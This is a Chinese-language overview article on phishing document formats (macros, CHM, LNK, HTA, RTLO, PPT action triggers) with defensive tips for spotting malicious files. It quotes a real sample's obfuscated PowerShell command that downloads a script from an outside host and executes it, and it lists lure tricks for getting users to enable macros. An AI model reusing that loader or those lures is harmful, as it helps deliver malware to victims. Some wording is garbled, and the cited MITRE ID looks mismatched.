前言钓鱼是最常见的社会工程攻击手段之一。所谓社会工程,就是??通过心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱,采用欺骗、伤害受害者等有害手段。在生活和工作中,最常用的电子邮件和各种文档也成为黑客常用的攻击媒介。近年来,钓鱼攻击的趋势也不断增加,尤其是在APT攻击、勒索软件攻击等事件中,扮演着重要的角色。姿势一:嵌入链接在PDF或Office文档中嵌入跳转链接是一种非常早期的钓鱼手段。通过文字信息的引导,让受害人点击页面。一不留神,就有可能获取受害人的账号、密码、银行卡、身份证等信息。Office、Adobe等应用软件目前在打开外部链接时会弹出安全提示。这种方法也更容易引起人的警觉性。姿势二:Office宏宏是Office自带的高级脚本功能。通过VBA代码,您可以在Office中完成特定任务,而无需重复相同的操作。目的是让用户文档中的一些任务自动化。由于早年宏病毒的泛滥,现在Office的宏功能默认是关闭的,但仍然无法阻止攻击者使用宏。那么如何诱使受害者启用宏功能是关键。常用套路:文档被保护,需要开启宏才能查看;添加模糊图片,提示需要开启宏才能查看高清图片;提示查看文档,按给出一系列步骤;贴上某个杀毒软件的logo图片,暗示该文件被安全软件保护。恶意宏代码也有多种方法避免查杀,增加分析难度。除了混淆和变形VBA代码,使用Excel功能隐藏代码也很常见。上图中的996-1006行被隐藏了。取消隐藏后,由于字体颜色与背景颜色相同,很难看清。修改这部分背景颜色如下。使用OLEDump工具可以看到这个宏代码就是读取这部分内容来下载恶意文件的。姿势三:CHM文件CHM是Windows帮助文件(如电子书)使用的扩展名,这个文件可以植入可执行代码。成功利用需要诱使用户打开恶意CHM文件,该文件可用于执行恶意代码。它的缺点是打开时会出现黑框和卡顿,很容易被注意到。上图是一个恶意CHM文档的例子,打开或点击左侧标题时会执行powershell代码。通过反汇编HH.exe,可以看到它的执行代码。尽管CHM文件的使用由来已久,但通过杀毒手段仍然活跃。著名的CobaltStrike支持生成CHM钓鱼文件。姿势四:漏洞利用利用Office、Adobe、IE等应用软件的漏洞,精心制作诱饵文档,是APT攻击的常客。现实中可能没有及时更新和打补丁,这种攻击方式的成功率还是比较高的。这类文档除了选择漏洞,在文档命名上也是煞费苦心。它通常包括最新的热点新闻或与自己相关的名称,这使人们不得不点击它。捆绑了漏洞的文档想要完美执行而不被发现还是比较困难的,但是只要达到目的,只要打开就已经完成了一大半。我们可以从几个细节来简单判断打开的文件是否有问题:打开后文件变小了,因为病毒体被释放了,原来的文件被干净的文件代替了。如果不注意原始大小,也可以从创建时间来判断;文档打开后,office程序自动退出,自动打开文档,第二次打开明显更快;文档运行错误,或者安装了不认识的程序;文档打开慢,系统卡顿时间长;文档打开后,显示的内容与标题不符,或者是乱码,甚至什么都没有。随着新冠病毒的爆发,许多行业都遭受了以COVID-19社会工程为主题的网络钓鱼攻击,大多与勒索软件捆绑在一起。姿势五:PPT手势触发如果你厌倦了一个文档一打开就触发,那么比较少见的是在PPT中设置一个动作来触发一行命令执行。这种利用方式在历史攻击中出现过。配置ppt为ppsx后缀。双击运行后,会进入播放模式。只要鼠标越过指定区域,就会执行一段代码。美中不足的是会被弹框警告。不警惕点击激活,就会被中招。运行程序中设置的代码如下:powershell-NoP-NonI-WHidden-ExecBypass"IEX(New-ObjectSystem.Net.WebClient).DownloadFile('http:'+[char]0x2F+[char]0x2F+'cccn.nl'+[char]0x2F+'c.php',\"$env:temp\ii.jse\");Invoke-Item\"$env:temp\ii.jse\""姿势6:LNK文件LNK(快捷方式或符号链接)是一种引用其他文件或程序的方法。最著名的是在震网病毒(Stuxnet)中的使用,并且有很多新的使用样本。我们先来看一个例子。通过分析工具dump执行代码,如下图所示。修改快捷方式的漏洞利用方法,在MITREATT@CK中ID为T0123,攻击者可以利用该方法实现持久化。姿势七:文件后缀为RTLO的伪装文件中有老办法,但在攻击中还是能看出来。RTLO字符的全称是“RIGHT-TO-LEFTOVERRIDE”,是一个不可显示的控制字符,其本质是一个unicode字符。它可以倒序排列任何语言的文本内容。它最初是用来支持一些从右到左书写的语言的文本,比如阿拉伯语和希伯来语。由于它具有重新排列字符的能力,它会被攻击者用来达到欺骗的目的,使用户运行一些有害的可执行文件。#在命令行可以看到完整的文件名'Usehelp-howtodeleteghost-'$'\342\200\256''cod.exeRTLO使用的关键字符是U+202E,用来修改文件的图标,还是很混乱。姿势八:HTA文件HTA是HTMLApplication的缩写。它直接将HTML保存为HTA格式。它是一个独立的应用软件。桌面程序的所有权限。CobaltStrike还支持生成HTA钓鱼文件,另一种勒索软件(Locky家族)就是利用HTA作为传播载体。有很多方法可以概括网络钓鱼文件。本文仅列出一些常用的钓鱼文件格式。截图基本上是真实攻击中使用的样本。对于钓鱼攻击,拥有良好的安全意识是最有效的防御。对于一些来路不明的文件,无论文件名多么诱人,也无法立即双击打开,必须及时安装安全补丁。
